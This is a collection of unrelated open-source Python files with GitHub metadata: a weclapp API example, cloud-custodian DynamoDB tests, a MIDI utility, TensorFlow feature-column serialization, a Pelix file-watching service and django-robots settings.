print("\nGet everything....")
customers = weclapp.customer.read()
print(customers)
contacts = weclapp.contact.read()
for contact in contacts:
print("%s: %s %s" % (contact["id"], contact["firstName"], contact["lastName"]))
print("\nCreate, Update and Delete")
contact = weclapp.contact.create("Bar", "Foo", email="[email protected]")
contact = weclapp.contact.read(res_id=contact["id"])
print("%s: %s %s" % (contact["id"], contact["firstName"], contact["lastName"]))
contact = weclapp.contact.update(contact["id"], "BarBar", "FooFoo", email="[email protected]")
contact = weclapp.contact.read(res_id=contact["id"])
print("%s: %s %s" % (contact["id"], contact["firstName"], contact["lastName"]))
weclapp.contact.delete(contact["id"])
try:
max_new = weclapp.contact.read(res_id=contact["id"])
except Exception:
print("Contact not found")
| {
"content_hash": "5f2116bb521301887ebeb7e7ae9fbd63",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 97,
"avg_line_length": 33.26829268292683,
"alnum_prop": 0.6752199413489736,
"repo_name": "useblocks/weclapp4py",
"id": "ea749b020c66adc65191cda8a96f27be79bc0e11",
"size": "1772",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "example.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "8331"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import, division, print_function, unicode_literals
from .common import BaseTest
from c7n.resources.dynamodb import DeleteTable
from c7n.executor import MainThreadExecutor
class DynamodbTest(BaseTest):
def test_resources(self):
session_factory = self.replay_flight_data('test_dynamodb_table')
p = self.load_policy(
{'name': 'tables',
'resource': 'dynamodb-table'},
session_factory=session_factory)
resources = p.run()
self.assertEqual(len(resources), 1)
self.assertEqual(resources[0]['TableName'], 'rolltop')
self.assertEqual(resources[0]['TableStatus'], 'ACTIVE')
def test_invoke_action(self):
session_factory = self.replay_flight_data(
'test_dynamodb_invoke_action')
p = self.load_policy(
{'name': 'tables',
'resource': 'dynamodb-table',
'actions': [
{'type': 'invoke-lambda',
'function': 'process_resources'}
]},
session_factory=session_factory)
resources = p.run()
self.assertEqual(len(resources), 1)
def test_delete_tables(self):
session_factory = self.replay_flight_data('test_dynamodb_delete_table')
self.patch(DeleteTable, 'executor_factory', MainThreadExecutor)
p = self.load_policy({
'name': 'delete-empty-tables',
'resource': 'dynamodb-table',
'filters': [{
'TableSizeBytes': 0}],
'actions': [{
'type': 'delete'}]}, session_factory=session_factory)
resources = p.run()
self.assertEqual(resources[0]['TableName'], 'c7n.DynamoDB.01')
def test_tag_filter(self):
session_factory = self.replay_flight_data('test_dynamodb_tag_filter')
client = session_factory().client('dynamodb')
p = self.load_policy({
'name': 'dynamodb-tag-filters',
'resource': 'dynamodb-table',
'filters': [{
'tag:test_key': 'test_value'}]},
session_factory=session_factory)
resources = p.run()
self.assertEqual(len(resources), 1)
arn = resources[0]['TableArn']
tags = client.list_tags_of_resource(ResourceArn=arn)
tag_map = {t['Key']: t['Value'] for t in tags['Tags']}
self.assertTrue('test_key' in tag_map)
def test_dynamodb_mark(self):
session_factory = self.replay_flight_data(
'test_dynamodb_mark')
client = session_factory().client('dynamodb')
p = self.load_policy({
'name': 'dynamodb-mark',
'resource': 'dynamodb-table',
'filters': [
{'TableName': 'rolltop'}],
'actions': [
{'type': 'mark-for-op', 'days': 4,
'op': 'delete', 'tag': 'test_tag'}]},
session_factory=session_factory)
resources = p.run()
arn = resources[0]['TableArn']
self.assertEqual(len(resources), 1)
tags = client.list_tags_of_resource(ResourceArn=arn)
tag_map = {t['Key']: t['Value'] for t in tags['Tags']}
self.assertTrue('test_key' in tag_map)
def test_dynamodb_tag(self):
session_factory = self.replay_flight_data('test_dynamodb_tag')
client = session_factory().client('dynamodb')
p = self.load_policy({
'name': 'dynamodb-tag-table',
'resource': 'dynamodb-table',
'filters': [{'TableName': 'rolltop'}],
'actions': [{
'type': 'tag',
'tags': {'new_tag_key': 'new_tag_value'}
}]
},
session_factory=session_factory)
resources = p.run()
arn = resources[0]['TableArn']
tags = client.list_tags_of_resource(ResourceArn=arn)
tag_map = {t['Key']: t['Value'] for t in tags['Tags']}
self.assertEqual({
'test_key': 'test_value',
'new_tag_key': 'new_tag_value'
},
tag_map)
def test_dynamodb_unmark(self):
session_factory = self.replay_flight_data(
'test_dynamodb_unmark')
client = session_factory().client('dynamodb')
p = self.load_policy({
'name': 'dynamodb-unmark',
'resource': 'dynamodb-table',
'filters': [
{'TableName': 'rolltop'}],
'actions': [
{'type': 'remove-tag',
'tags': ['test_key']}]},
session_factory=session_factory)
resources = p.run()
arn = resources[0]['TableArn']
self.assertEqual(len(resources), 1)
tags = client.list_tags_of_resource(ResourceArn=arn)
self.assertFalse('test_key' in tags)
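# The tests above follow cloud-custodian's record/replay pattern: replay_flight_data()
# loads previously captured AWS API responses, load_policy() builds a policy from its
# dict form, and p.run() returns the resources that matched the filters after the
# actions were applied.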
| {
"content_hash": "63cf9a990e2d454559f3eadfb23d1ebe",
"timestamp": "",
"source": "github",
"line_count": 124,
"max_line_length": 82,
"avg_line_length": 39.04838709677419,
"alnum_prop": 0.540272614622057,
"repo_name": "jimmyraywv/cloud-custodian",
"id": "91d121591413f49f004027e2a202105c998553a5",
"size": "5432",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tests/test_dynamodb.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "1364"
},
{
"name": "Python",
"bytes": "1760566"
}
],
"symlink_target": ""
} |
import argparse
import os
import signal
import sys
import time
import rtmidi
def signal_handler(signal, frame):
"""Handler for Ctrl-C"""
sys.exit(0)
def midi_in_callback(value, args):
"""Function called when MIDI data is received"""
data = value[0]
if args.hex:
print('[' + ', '.join('0x%02X' % x for x in data) + ']')
else:
print(data)
def get_port(client, device_id):
"""Return open port for a device"""
try:
# Try to parse device id as number first
dev_id = int(device_id)
if not dev_id < len(client.get_ports()):
raise Exception('Device id out of range')
except ValueError:
# If this fails, try to find a port name starting with it
for i, name in enumerate(client.get_ports()):
if name.lower().startswith(device_id.lower()):
return client.open_port(i)
        # If this also fails, try to find a port name that contains
        # the device id as a substring
for i, name in enumerate(client.get_ports()):
if device_id.lower() in name.lower():
return client.open_port(i)
raise Exception('Device "%s" not found' % device_id)
return client.open_port(dev_id)
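# Resolution order used by get_port(), shown for rtmidi.MidiIn() (port names are
# hypothetical):
#   get_port(client, "0")          -> opens the port with index 0
#   get_port(client, "launchpad")  -> first port whose name starts with "launchpad",
#                                     otherwise the first port whose name contains it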
def main():
if len(sys.argv) < 2:
# Show help when no arguments are given
sys.argv.append('-h')
# Setup command line parser
parser = argparse.ArgumentParser(description='MIDI utility')
parser.add_argument('-l', '--list', action='store_true',
help='List connected devices')
parser.add_argument('-d', '--device', metavar='ID',
help='Selected device')
parser.add_argument('-w', '--write', type=str, nargs='+', metavar='DATA',
help='Write data')
parser.add_argument('-r', '--read', action='store_true',
help='Read data')
parser.add_argument('-x', '--hex', action='store_true',
                        help='Show/interpret data as hex')
parser.add_argument('-s', '--sysex-file', metavar='FILE',
help='Sysex file to transmit')
args = parser.parse_args()
try:
if args.list:
# List command, show all connected devices
print()
print('Available ports:')
print()
print('\tInput:')
print('\t', 'ID', 'Name', sep='\t')
for i, name in enumerate(rtmidi.MidiIn().get_ports()):
print('\t', i, name, sep='\t')
print()
print('\tOutput:')
print('\t', 'ID', 'Name', sep='\t')
for i, name in enumerate(rtmidi.MidiOut().get_ports()):
print('\t', i, name, sep='\t')
print()
elif args.write:
# Write command, send data
if not args.device:
raise Exception('No device specified.')
outport = get_port(rtmidi.MidiOut(), args.device)
if args.hex:
data = [int(x, 16) for x in args.write]
else:
data = [int(x, 0) for x in args.write]
outport.send_message(data)
del outport
elif args.read:
# Read command, receive data until Ctrl-C is pressed
signal.signal(signal.SIGINT, signal_handler)
if not args.device:
raise Exception('No device specified.')
inport = get_port(rtmidi.MidiIn(), args.device)
inport.set_callback(midi_in_callback, args)
inport.ignore_types(False, False, False)
while True:
time.sleep(1)
elif args.sysex_file:
# Send sysex file command
if not args.device:
raise Exception('No device specified.')
outport = get_port(rtmidi.MidiOut(), args.device)
file_path = args.sysex_file
if not (os.path.exists(file_path) and os.path.isfile(file_path)):
raise Exception('File "%s" does not exist.' % file_path)
with open(file_path, "rb") as f:
data = f.read()
data_pos = 0
while True:
sysex_start_pos = data.find(b"\xF0", data_pos)
sysex_end_pos = data.find(b"\xF7", data_pos)
if sysex_start_pos >= 0 and sysex_end_pos >= 0:
message = data[sysex_start_pos:sysex_end_pos + 1]
print("Sending sysex message with %i bytes." %
len(message))
outport.send_message(message)
time.sleep(0.05)
data_pos = sysex_end_pos + 1
else:
break
except Exception as e:
print('Error:', e)
if __name__ == '__main__':
main()
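# Example invocations (device ids and file names are hypothetical; the flags are the
# ones defined in main() above):
#   python midiutil.py -l                          # list input/output ports
#   python midiutil.py -d 0 -r                     # print incoming messages from port 0
#   python midiutil.py -d 0 -x -w 0x90 0x3C 0x7F   # send a note-on given as hex bytes
#   python midiutil.py -d 0 -s patch.syx           # send every sysex message in a file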
| {
"content_hash": "6eb717889e6415e45afefa8822b78dfe",
"timestamp": "",
"source": "github",
"line_count": 136,
"max_line_length": 77,
"avg_line_length": 35.86029411764706,
"alnum_prop": 0.515070740209145,
"repo_name": "sourcebox/midiutil",
"id": "e44d0b542a843fff2c4eb85e7c518bb3a3c2f94a",
"size": "4901",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "midiutil.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "3026"
}
],
"symlink_target": ""
} |
"""FeatureColumn serialization, deserialization logic."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import six
from tensorflow.python.feature_column import feature_column_v2 as fc_lib
from tensorflow.python.feature_column import sequence_feature_column as sfc_lib
from tensorflow.python.ops import init_ops
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import tf_export
_FEATURE_COLUMNS = [
fc_lib.BucketizedColumn, fc_lib.CrossedColumn, fc_lib.EmbeddingColumn,
fc_lib.HashedCategoricalColumn, fc_lib.IdentityCategoricalColumn,
fc_lib.IndicatorColumn, fc_lib.NumericColumn,
fc_lib.SequenceCategoricalColumn, fc_lib.SequenceDenseColumn,
fc_lib.SharedEmbeddingColumn, fc_lib.VocabularyFileCategoricalColumn,
fc_lib.VocabularyListCategoricalColumn, fc_lib.WeightedCategoricalColumn,
init_ops.TruncatedNormal, sfc_lib.SequenceNumericColumn
]
@tf_export('__internal__.feature_column.serialize_feature_column', v1=[])
def serialize_feature_column(fc):
"""Serializes a FeatureColumn or a raw string key.
This method should only be used to serialize parent FeatureColumns when
implementing FeatureColumn.get_config(), else serialize_feature_columns()
is preferable.
This serialization also keeps information of the FeatureColumn class, so
deserialization is possible without knowing the class type. For example:
  a = numeric_column('price')
a.get_config() gives:
{
'key': 'price',
'shape': (1,),
'default_value': None,
'dtype': 'float32',
'normalizer_fn': None
}
While serialize_feature_column(a) gives:
{
'class_name': 'NumericColumn',
'config': {
'key': 'price',
'shape': (1,),
'default_value': None,
'dtype': 'float32',
'normalizer_fn': None
}
}
Args:
fc: A FeatureColumn or raw feature key string.
Returns:
Keras serialization for FeatureColumns, leaves string keys unaffected.
Raises:
ValueError if called with input that is not string or FeatureColumn.
"""
if isinstance(fc, six.string_types):
return fc
elif isinstance(fc, fc_lib.FeatureColumn):
return {'class_name': fc.__class__.__name__, 'config': fc.get_config()}
else:
raise ValueError('Instance: {} is not a FeatureColumn'.format(fc))
@tf_export('__internal__.feature_column.deserialize_feature_column', v1=[])
def deserialize_feature_column(config,
custom_objects=None,
columns_by_name=None):
"""Deserializes a `config` generated with `serialize_feature_column`.
This method should only be used to deserialize parent FeatureColumns when
implementing FeatureColumn.from_config(), else deserialize_feature_columns()
is preferable. Returns a FeatureColumn for this config.
Args:
config: A Dict with the serialization of feature columns acquired by
`serialize_feature_column`, or a string representing a raw column.
custom_objects: A Dict from custom_object name to the associated keras
serializable objects (FeatureColumns, classes or functions).
columns_by_name: A Dict[String, FeatureColumn] of existing columns in order
to avoid duplication.
Raises:
ValueError if `config` has invalid format (e.g: expected keys missing,
or refers to unknown classes).
Returns:
A FeatureColumn corresponding to the input `config`.
"""
# TODO(b/118939620): Simplify code if Keras utils support object deduping.
if isinstance(config, six.string_types):
return config
# A dict from class_name to class for all FeatureColumns in this module.
# FeatureColumns not part of the module can be passed as custom_objects.
module_feature_column_classes = {
cls.__name__: cls for cls in _FEATURE_COLUMNS}
if columns_by_name is None:
columns_by_name = {}
(cls,
cls_config) = _class_and_config_for_serialized_keras_object(
config,
module_objects=module_feature_column_classes,
custom_objects=custom_objects,
printable_module_name='feature_column_v2')
if not issubclass(cls, fc_lib.FeatureColumn):
raise ValueError(
'Expected FeatureColumn class, instead found: {}'.format(cls))
# Always deserialize the FeatureColumn, in order to get the name.
new_instance = cls.from_config( # pylint: disable=protected-access
cls_config,
custom_objects=custom_objects,
columns_by_name=columns_by_name)
# If the name already exists, re-use the column from columns_by_name,
# (new_instance remains unused).
return columns_by_name.setdefault(
_column_name_with_class_name(new_instance), new_instance)
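# Illustrative round trip (a sketch; 'price' is a hypothetical column name):
#
#   fc = fc_lib.numeric_column('price')
#   config = serialize_feature_column(fc)    # {'class_name': 'NumericColumn', 'config': {...}}
#   restored = deserialize_feature_column(config)
#
# Raw string keys pass through both functions unchanged.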
def serialize_feature_columns(feature_columns):
"""Serializes a list of FeatureColumns.
Returns a list of Keras-style config dicts that represent the input
FeatureColumns and can be used with `deserialize_feature_columns` for
reconstructing the original columns.
Args:
feature_columns: A list of FeatureColumns.
Returns:
Keras serialization for the list of FeatureColumns.
Raises:
ValueError if called with input that is not a list of FeatureColumns.
"""
return [serialize_feature_column(fc) for fc in feature_columns]
def deserialize_feature_columns(configs, custom_objects=None):
"""Deserializes a list of FeatureColumns configs.
Returns a list of FeatureColumns given a list of config dicts acquired by
`serialize_feature_columns`.
Args:
configs: A list of Dicts with the serialization of feature columns acquired
by `serialize_feature_columns`.
custom_objects: A Dict from custom_object name to the associated keras
serializable objects (FeatureColumns, classes or functions).
Returns:
FeatureColumn objects corresponding to the input configs.
Raises:
ValueError if called with input that is not a list of FeatureColumns.
"""
columns_by_name = {}
return [
deserialize_feature_column(c, custom_objects, columns_by_name)
for c in configs
]
def _column_name_with_class_name(fc):
"""Returns a unique name for the feature column used during deduping.
Without this two FeatureColumns that have the same name and where
one wraps the other, such as an IndicatorColumn wrapping a
SequenceCategoricalColumn, will fail to deserialize because they will have the
same name in columns_by_name, causing the wrong column to be returned.
Args:
fc: A FeatureColumn.
Returns:
A unique name as a string.
"""
return fc.__class__.__name__ + ':' + fc.name
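# The deduping key has the form '<ClassName>:<column name>', e.g. 'NumericColumn:price'
# for a numeric column named 'price' (a hypothetical name).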
def _serialize_keras_object(instance):
"""Serialize a Keras object into a JSON-compatible representation."""
_, instance = tf_decorator.unwrap(instance)
if instance is None:
return None
if hasattr(instance, 'get_config'):
name = instance.__class__.__name__
config = instance.get_config()
serialization_config = {}
for key, item in config.items():
if isinstance(item, six.string_types):
serialization_config[key] = item
continue
# Any object of a different type needs to be converted to string or dict
# for serialization (e.g. custom functions, custom classes)
try:
serialized_item = _serialize_keras_object(item)
if isinstance(serialized_item, dict) and not isinstance(item, dict):
serialized_item['__passive_serialization__'] = True
serialization_config[key] = serialized_item
except ValueError:
serialization_config[key] = item
return {'class_name': name, 'config': serialization_config}
if hasattr(instance, '__name__'):
return instance.__name__
raise ValueError('Cannot serialize', instance)
def _deserialize_keras_object(identifier,
module_objects=None,
custom_objects=None,
printable_module_name='object'):
"""Turns the serialized form of a Keras object back into an actual object."""
if identifier is None:
return None
if isinstance(identifier, dict):
# In this case we are dealing with a Keras config dictionary.
config = identifier
(cls, cls_config) = _class_and_config_for_serialized_keras_object(
config, module_objects, custom_objects, printable_module_name)
if hasattr(cls, 'from_config'):
arg_spec = tf_inspect.getfullargspec(cls.from_config)
custom_objects = custom_objects or {}
if 'custom_objects' in arg_spec.args:
return cls.from_config(
cls_config,
custom_objects=dict(
list(custom_objects.items())))
return cls.from_config(cls_config)
else:
# Then `cls` may be a function returning a class.
# in this case by convention `config` holds
# the kwargs of the function.
custom_objects = custom_objects or {}
return cls(**cls_config)
elif isinstance(identifier, six.string_types):
object_name = identifier
if custom_objects and object_name in custom_objects:
obj = custom_objects.get(object_name)
else:
obj = module_objects.get(object_name)
if obj is None:
raise ValueError(
'Unknown ' + printable_module_name + ': ' + object_name)
# Classes passed by name are instantiated with no args, functions are
# returned as-is.
if tf_inspect.isclass(obj):
return obj()
return obj
elif tf_inspect.isfunction(identifier):
# If a function has already been deserialized, return as is.
return identifier
else:
raise ValueError('Could not interpret serialized %s: %s' %
(printable_module_name, identifier))
def _class_and_config_for_serialized_keras_object(
config,
module_objects=None,
custom_objects=None,
printable_module_name='object'):
"""Returns the class name and config for a serialized keras object."""
if (not isinstance(config, dict) or 'class_name' not in config or
'config' not in config):
raise ValueError('Improper config format: ' + str(config))
class_name = config['class_name']
cls = _get_registered_object(class_name, custom_objects=custom_objects,
module_objects=module_objects)
if cls is None:
raise ValueError('Unknown ' + printable_module_name + ': ' + class_name)
cls_config = config['config']
deserialized_objects = {}
for key, item in cls_config.items():
if isinstance(item, dict) and '__passive_serialization__' in item:
deserialized_objects[key] = _deserialize_keras_object(
item,
module_objects=module_objects,
custom_objects=custom_objects,
printable_module_name='config_item')
elif (isinstance(item, six.string_types) and
tf_inspect.isfunction(_get_registered_object(item, custom_objects))):
# Handle custom functions here. When saving functions, we only save the
# function's name as a string. If we find a matching string in the custom
# objects during deserialization, we convert the string back to the
# original function.
# Note that a potential issue is that a string field could have a naming
# conflict with a custom function name, but this should be a rare case.
# This issue does not occur if a string field has a naming conflict with
# a custom object, since the config of an object will always be a dict.
deserialized_objects[key] = _get_registered_object(item, custom_objects)
for key, item in deserialized_objects.items():
cls_config[key] = deserialized_objects[key]
return (cls, cls_config)
def _get_registered_object(name, custom_objects=None, module_objects=None):
if custom_objects and name in custom_objects:
return custom_objects[name]
elif module_objects and name in module_objects:
return module_objects[name]
return None
| {
"content_hash": "9ccb94cbf382d07f14f5c892be2d4524",
"timestamp": "",
"source": "github",
"line_count": 328,
"max_line_length": 80,
"avg_line_length": 36.426829268292686,
"alnum_prop": 0.6947606293940408,
"repo_name": "petewarden/tensorflow",
"id": "8da7c217826ee934af13b84ff0b068a844fde759",
"size": "12637",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tensorflow/python/feature_column/serialization.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "31796"
},
{
"name": "Batchfile",
"bytes": "55269"
},
{
"name": "C",
"bytes": "895451"
},
{
"name": "C#",
"bytes": "8562"
},
{
"name": "C++",
"bytes": "82100676"
},
{
"name": "CMake",
"bytes": "6500"
},
{
"name": "Dockerfile",
"bytes": "112853"
},
{
"name": "Go",
"bytes": "1867248"
},
{
"name": "HTML",
"bytes": "4686483"
},
{
"name": "Java",
"bytes": "984477"
},
{
"name": "Jupyter Notebook",
"bytes": "550862"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "MLIR",
"bytes": "1982867"
},
{
"name": "Makefile",
"bytes": "66496"
},
{
"name": "Objective-C",
"bytes": "116558"
},
{
"name": "Objective-C++",
"bytes": "317461"
},
{
"name": "PHP",
"bytes": "4236"
},
{
"name": "Pascal",
"bytes": "318"
},
{
"name": "Pawn",
"bytes": "20422"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "Python",
"bytes": "37425809"
},
{
"name": "RobotFramework",
"bytes": "1779"
},
{
"name": "Roff",
"bytes": "2705"
},
{
"name": "Ruby",
"bytes": "7464"
},
{
"name": "SWIG",
"bytes": "8992"
},
{
"name": "Shell",
"bytes": "700106"
},
{
"name": "Smarty",
"bytes": "35725"
},
{
"name": "Starlark",
"bytes": "3613406"
},
{
"name": "Swift",
"bytes": "62814"
},
{
"name": "Vim Snippet",
"bytes": "58"
}
],
"symlink_target": ""
} |
"""
FileInstall: Polls for changes on files in a directory and notifies listeners
:author: Thomas Calmant
:copyright: Copyright 2014, isandlaTech
:license: Apache License 2.0
:version: 0.5.8
:status: Beta
..
Copyright 2014 isandlaTech
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Module version
__version_info__ = (0, 5, 8)
__version__ = ".".join(str(x) for x in __version_info__)
# Documentation strings format
__docformat__ = "restructuredtext en"
# ------------------------------------------------------------------------------
# Pelix
from pelix.ipopo.decorators import ComponentFactory, Provides, Requires, \
Validate, Invalidate, Instantiate, BindField, UnbindField, UpdateField, \
Property
import pelix.services as services
import pelix.threadpool
# Standard library
import logging
import os
import threading
import zlib
# ------------------------------------------------------------------------------
_logger = logging.getLogger(__name__)
# ------------------------------------------------------------------------------
@ComponentFactory()
@Provides(services.SERVICE_FILEINSTALL)
@Requires('_listeners', services.SERVICE_FILEINSTALL_LISTENERS,
aggregate=True, optional=True)
@Property('_poll_time', 'poll.time', 1)
@Instantiate('pelix-services-file-install')
class FileInstall(object):
"""
Polls folders to look for files modifications
"""
def __init__(self):
"""
Sets up members
"""
# Listeners (injected)
self._listeners = []
# Folder -> [listeners] (computed)
self._folder_listeners = {}
# Polling delta time (1 second by default)
self._poll_time = 1
# Lock
self.__lock = threading.RLock()
# Single thread task pool to notify listeners
self.__pool = pelix.threadpool.ThreadPool(
1, logname="FileInstallNotifier")
# 1 thread per watched folder (folder -> Thread)
self.__threads = {}
# Thread stoppers (folder -> Event)
self.__stoppers = {}
# Validation flag
self.__validated = False
@Validate
def _validate(self, context):
"""
Component validated
"""
with self.__lock:
# Start the task pool
self.__pool.start()
# Update the flag
self.__validated = True
@Invalidate
def _invalidate(self, context):
"""
Component invalidated
"""
with self.__lock:
# Update the flag
self.__validated = False
# Stop all threads
for event in set(self.__stoppers.values()):
event.set()
# Wait for them
for thread in set(self.__threads.values()):
thread.join()
# Stop the task pool
self.__pool.stop()
# Clean up
self.__stoppers.clear()
self.__threads.clear()
@BindField('_listeners')
def _bind_listener(self, _, svc, svc_ref):
"""
A new listener is bound
"""
with self.__lock:
folder = svc_ref.get_property(services.PROP_FILEINSTALL_FOLDER)
if folder:
# Register the listener for this service
self.add_listener(folder, svc)
@UpdateField('_listeners')
def _update_field(self, _, svc, svc_ref, old_props):
"""
A bound listener has been updated
"""
with self.__lock:
old_folder = old_props.get(services.PROP_FILEINSTALL_FOLDER)
new_folder = svc_ref.get_property(services.PROP_FILEINSTALL_FOLDER)
if old_folder != new_folder:
# Folder changed
self.remove_listener(old_folder, svc)
self.add_listener(new_folder, svc)
@UnbindField('_listeners')
def _unbind_listener(self, _, svc, svc_ref):
"""
A listener is gone
"""
with self.__lock:
folder = svc_ref.get_property(services.PROP_FILEINSTALL_FOLDER)
if folder:
# Remove the listener
self.remove_listener(folder, svc)
def add_listener(self, folder, listener):
"""
Manual registration of a folder listener
:param folder: Path to the folder to watch
:param listener: Listener to register
:return: True if the listener has been registered
"""
with self.__lock:
# Simply add the listener
if folder:
try:
listeners = self._folder_listeners[folder]
except KeyError:
# Unknown folder
listeners = self._folder_listeners[folder] = set()
# Start a new thread
event = self.__stoppers[folder] = threading.Event()
thread = threading.Thread(
target=self.__watch,
args=(folder, event),
name="FileInstall-{0}".format(folder))
thread.daemon = True
self.__threads[folder] = thread
thread.start()
listeners.add(listener)
return True
return False
def remove_listener(self, folder, listener):
"""
Manual unregistration of a folder listener.
:param folder: Path to the folder the listener watched
:param listener: Listener to unregister
:raise ValueError: The listener wasn't watching this folder
"""
with self.__lock:
# Remove the listener
listeners = self._folder_listeners[folder]
listeners.remove(listener)
if not listeners:
try:
# Stop the corresponding thread
self.__stoppers.pop(folder).set()
except KeyError:
# Component invalidated
pass
else:
# Wait for the thread to stop
self.__threads.pop(folder).join()
# No more listener for this folder
del self._folder_listeners[folder]
def __notify(self, folder, added, updated, deleted):
"""
Notifies listeners that files of a folder has been modified
:param folder: Folder where changes occurred
:param added: Names of added files
:param updated: Names of modified files
:param deleted: Names of removed files
"""
with self.__lock:
try:
# Get a copy of the listeners for this folder
listeners = self._folder_listeners[folder].copy()
except KeyError:
# No (more) listeners: do nothing
return
for listener in listeners:
try:
listener.folder_change(folder, added, updated, deleted)
except Exception as ex:
_logger.exception("Error notifying a folder listener: %s", ex)
def __get_checksum(self, filepath):
"""
Returns the checksum (Adler32) of the given file
:param filepath: Path to the file
:return: The checksum (int) of the given file
:raise OSError: File not accessible
:raise IOError: File not readable
"""
# Don't forget to open the file in binary mode
with open(filepath, 'rb') as filep:
# Return the checksum of the given file
return zlib.adler32(filep.read())
def __get_file_info(self, folder, filename):
"""
Returns the (mtime, checksum) tuple for the given file
:param folder: Path to the parent folder
:param filename: Base name of the file
:return: A tuple containing file information
:raise OSError: File not accessible
:raise IOError: File not readable
"""
filepath = os.path.join(folder, filename)
return os.path.getmtime(filepath), self.__get_checksum(filepath)
def __check_different(self, folder, filename, file_info, updated):
"""
Checks if the given file has changed since the previous check
:param folder: Path to the parent folder
:param filename: Base name of the file
:param file_info: Current information about the file
:param updated: Set of updated files, where the file name might be
added
:return: The (updated) file information tuple
:raise OSError: File not accessible
:raise IOError: File not readable
"""
# Compute the file path
filepath = os.path.join(folder, filename)
# Get the previous modification time
previous_mtime = file_info[0]
# Get the new modification time
mtime = os.path.getmtime(filepath)
if previous_mtime == mtime:
# No modification (no need to compute the checksum)
return file_info
# Get the previous checksum
previous_checksum = file_info[1]
# Compute the new one
checksum = self.__get_checksum(filepath)
if previous_checksum == checksum:
# No real modification, update file info
return mtime, checksum
# File modified
updated.add(filename)
return mtime, checksum
def __watch(self, folder, stopper):
"""
Loop that looks for changes in the given folder
:param folder: Folder to watch
:param stopper: An Event object that will stop the loop once set
"""
# File name -> (modification time, checksum)
previous_info = {}
while not stopper.wait(self._poll_time) and not stopper.is_set():
if not os.path.exists(folder):
# Nothing to do yet
continue
# Look for files
filenames = set(filename for filename in os.listdir(folder)
if os.path.isfile(os.path.join(folder, filename)))
# Prepare the sets
added = set()
updated = set()
deleted = set(previous_info.keys()).difference(filenames)
# Compute differences
for filename in filenames:
try:
# Get previous information
file_info = previous_info[filename]
except KeyError:
# Unknown file: added one
added.add(filename)
previous_info[filename] = self.__get_file_info(folder,
filename)
else:
try:
# Known file name
new_info = self.__check_different(folder, filename,
file_info, updated)
# Store new information
previous_info[filename] = new_info
except (IOError, OSError):
# Error reading file, do nothing
pass
# Remove information about deleted files
for filename in deleted:
del previous_info[filename]
if added or updated or deleted:
# Something changed: notify listeners
self.__pool.enqueue(self.__notify, folder, added, updated,
deleted)
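# Illustrative listener sketch (the component and folder names are hypothetical). Any
# service registered under SERVICE_FILEINSTALL_LISTENERS with the
# PROP_FILEINSTALL_FOLDER property is bound above and then called back from the
# notification pool:
#
#     class ConfigWatcher(object):
#         def folder_change(self, folder, added, updated, deleted):
#             # added/updated/deleted are sets of base file names inside folder
#             pass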
| {
"content_hash": "691cc3ec764ee4f8a13aa8e9b528fabc",
"timestamp": "",
"source": "github",
"line_count": 375,
"max_line_length": 80,
"avg_line_length": 32.29866666666667,
"alnum_prop": 0.5434280052840158,
"repo_name": "isandlaTech/cohorte-demos",
"id": "8d695305aa2d1a32432eb1f21e7d7b906c0faf00",
"size": "12166",
"binary": false,
"copies": "4",
"ref": "refs/heads/dev",
"path": "led/dump/led-demo-raspberry/cohorte/dist/cohorte-1.0.0-1.0.0-20141201.234602-19-python-distribution/repo/bundles/pelix/services/fileinstall.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Arduino",
"bytes": "4339"
},
{
"name": "Batchfile",
"bytes": "3349"
},
{
"name": "CSS",
"bytes": "722861"
},
{
"name": "HTML",
"bytes": "267983"
},
{
"name": "Java",
"bytes": "22060"
},
{
"name": "JavaScript",
"bytes": "11127825"
},
{
"name": "Python",
"bytes": "16153349"
},
{
"name": "Shell",
"bytes": "33275"
}
],
"symlink_target": ""
} |
import sys
class Settings:
defaults = {
#: A list of one or more sitemaps to inform robots about:
"SITEMAP_URLS": ("ROBOTS_SITEMAP_URLS", []),
"USE_SITEMAP": ("ROBOTS_USE_SITEMAP", True),
"USE_HOST": ("ROBOTS_USE_HOST", True),
"CACHE_TIMEOUT": ("ROBOTS_CACHE_TIMEOUT", None),
"SITE_BY_REQUEST": ("ROBOTS_SITE_BY_REQUEST", False),
"USE_SCHEME_IN_HOST": ("ROBOTS_USE_SCHEME_IN_HOST", False),
"SITEMAP_VIEW_NAME": ("ROBOTS_SITEMAP_VIEW_NAME", False),
}
def __getattr__(self, attribute):
from django.conf import settings
if attribute in self.defaults:
return getattr(settings, *self.defaults[attribute])
sys.modules[__name__] = Settings()
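# Hypothetical usage (not part of the original module): because the module
# object is swapped for a Settings instance above, importing code reads options
# with plain attribute access and gets either the Django override or the
# default, e.g.:
#
#     from robots import settings
#     settings.SITEMAP_URLS   # ROBOTS_SITEMAP_URLS if configured, else []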
| {
"content_hash": "83c7008d33693cefcab5efc37eb29d09",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 67,
"avg_line_length": 32.391304347826086,
"alnum_prop": 0.6013422818791946,
"repo_name": "jazzband/django-robots",
"id": "bcd58daa975f5398504b2d47a990010eed4a8cfd",
"size": "745",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/robots/settings.py",
"mode": "33188",
